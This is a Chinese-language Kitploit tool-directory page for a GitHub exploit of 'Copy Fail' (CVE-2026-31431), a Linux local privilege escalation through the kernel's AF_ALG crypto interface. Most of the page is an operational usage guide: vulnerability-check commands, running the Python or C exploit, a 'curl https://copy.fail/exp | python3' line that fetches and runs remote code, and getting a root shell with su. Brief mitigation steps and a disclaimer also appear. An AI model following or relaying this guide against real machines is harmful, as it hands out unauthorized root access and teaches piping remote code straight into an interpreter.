Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Copy-Fail-Exploit-CVE-2026-31431 — 大多数 Linux LPE 需要竞态窗口或内核特定偏移量。Copy Fail 是一个直线逻辑缺陷,两者都不需要。同一个 732 字节的 Python 脚本(或 .c elf)可 root 自 2017 年以来发布的所有 Linux 发行版。 | Kitploit
工具/GitHubGitHub/painoob/copy-fail-exploit-cve-2026-31431
权限提升漏洞利用框架漏洞分析漏洞利用渗透测试二进制利用
GitHubpainoob/copy-fail-exploit-cve-2026-31431

Copy-Fail-Exploit-CVE-2026-31431

大多数 Linux LPE 需要竞态窗口或内核特定偏移量。Copy Fail 是一个直线逻辑缺陷,两者都不需要。同一个 732 字节的 Python 脚本(或 .c elf)可 root 自 2017 年以来发布的所有 Linux 发行版。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1082294个月前Kitploit 审核通过

Copy Fail (CVE-2026-31431) – 漏洞利用使用指南

⚠️ 免责声明

本内容仅供教育和授权安全测试使用。切勿在未经明确许可的系统上运行此漏洞。


📌 概述

Copy Fail (CVE-2026-31431) 是一个影响 Linux 本地权限提升(LPE)的漏洞,通过 AF_ALG 影响内核加密 API。

它允许非特权用户覆盖 SUID 二进制文件(例如 /usr/bin/su)的页缓存数据,从而获得 root 访问权限。


🧠 要求

系统要求

  • Linux 内核(存在漏洞 – 取决于补丁状态)
  • 已启用 AF_ALG
  • 已加载 algif_aead 模块

Python 漏洞利用要求

  • Python 3.10+
  • 支持:
    • os.splice
    • socket(AF_ALG)

🔍 检查漏洞

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

预期指标:

  • authencesn(hmac(sha256),cbc(aes))
  • 已加载 algif_aead

🐍 运行 Python 漏洞利用

1. 直接执行

root@kitploit:~
python3 copy_fail_exp.py

2. 或通过 curl(如果远程托管)

root@kitploit:~
curl https://copy.fail/exp | python3

3. 触发 root shell

root@kitploit:~
su
id

预期结果:

root@kitploit:~
uid=0(root)

⚠️ 常见问题(Python)

❌ 错误:os.splice not found

原因:

  • Python 版本 < 3.10
  • 受限构建

解决方案:

  • 使用更新的 Python 二进制文件
  • 上传静态 Python 解释器

⚙️ 编译 C 版本

1. 编译

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. 赋予可执行权限

root@kitploit:~
chmod +x copy_fail

3. 运行漏洞利用

root@kitploit:~
./copy_fail
su

⚠️ 常见问题(C)

❌ 漏洞利用运行但未获得 root

可能原因:

  • 内核已打补丁
  • 偏移量不正确
  • 环境不匹配

❌ 编译错误

安装所需工具:

root@kitploit:~
apt update && apt install build-essential

🧪 故障排查

检查系统是否已打补丁

root@kitploit:~
dmesg | grep -i alg

验证模块

root@kitploit:~
lsmod | grep algif_aead

🛡️ 缓解措施

禁用易受攻击的模块

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

应用内核补丁

更新系统:

root@kitploit:~
apt update && apt upgrade

📌 说明

  • 漏洞利用仅修改页缓存(非持久性)
  • 需要本地访问权限
  • 默认情况下无法远程利用

🧠 最终见解

如果漏洞利用失败,请考虑:

  • 内核已打补丁
  • 环境限制
  • 其他权限提升途径(SUID、capabilities、sudo 配置错误)

📚 参考

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 作者说明

请仅在实验室、CTF 和授权渗透测试中负责任地使用此漏洞。

下载工具